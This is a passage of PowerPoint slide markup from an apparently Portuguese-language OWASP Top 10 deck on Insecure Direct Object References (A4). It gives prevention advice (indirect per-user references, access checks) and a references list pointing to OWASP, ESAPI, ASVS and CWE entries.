              <a:rPr lang="pt-BR" sz="950" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>elas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>não podem reconhecer o que requer proteção ou o que é seguro ou inseguro.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3475038" y="6588224"/>
            <a:ext cx="3382962" cy="2555776"/>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lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referências</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId4"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Top 10-2007 on Insecure Dir Object References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>ESAPI Access Reference Map </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>ESAPI Access Control API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (See isAuthorizedForData(), isAuthorizedForFile(), isAuthorizedForFunction() )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Para requisitos adicionais de acesso de controle, veja o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>ASVS requirements area for Access Control (V4)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Externas</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>CWE Entry 639 on Insecure Direct Object References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>CWE Entry 22 on Path Traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>um exemplo de um ataque de Referência Direta a Objeto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3475038" y="3779912"/>
            <a:ext cx="3382962" cy="2736304"/>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lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Como faço para evitar?</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="500" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prevenção a referência </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>insegura e direta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>objetos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requer a seleção de uma abordagem para proteção de cada objeto acessível ao usuário </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(por exemplo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, número do objeto, nome </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arquivo):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>referência indiretas a objetos por usuário </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ou sessão. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Isso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>impede que o atacante atinja diretamente os recursos não autorizados. Por exemplo, em vez de utilizar a chave de banco de dados do recurso, uma lista </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seis recursos autorizados para o usuário </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>atual  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>poderia utilizar os números de 1 a 6 para indicar qual valor o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usuário selecionou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. A aplicação tem que mapear as referências indiretas por usuário de volta para a chave do banco de dados real no servidor. OWASP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>ESAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> inclui tanto mapas de referência de acesso seqüencial e aleatório que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>os desenvolvedores podem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usar para eliminar as referências diretas a objetos. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verificar o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>acesso. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cada utilização </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uma referência direta a objeto de uma origem não confiável deve incluir uma verificação de controle de acesso para garantir que o usuário está autorizado para o objeto requisitado. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="76200"/>
            <a:ext cx="5486400" cy="762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Referência Insegura e Direta a Objetos</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>A4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 26"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="15159" y="1014413"/>
            <a:ext cx="6669804" cy="525268"/>
            <a:chOff x="14975" y="1014596"/>
            <a:chExt cx="6670153" cy="525104"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="29" name="Group 28"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="14975" y="1014596"/>
              <a:ext cx="6670153" cy="525104"/>
              <a:chOff x="14975" y="997424"/>
              <a:chExt cx="6670153" cy="525104"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2879691" y="1073600"/>
                <a:ext cx="1020816" cy="380881"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vulnerabilidades</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>        de Segurança</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="35" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="145" y="1344"/>
                  <a:ext cx="190" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050" algn="ctr">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="45" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>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46" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>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47" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>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48" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1633"/>
                  <a:ext cx="288" cy="0"/>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grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1309572" y="1078361"/>
                <a:ext cx="838244" cy="357076"/>
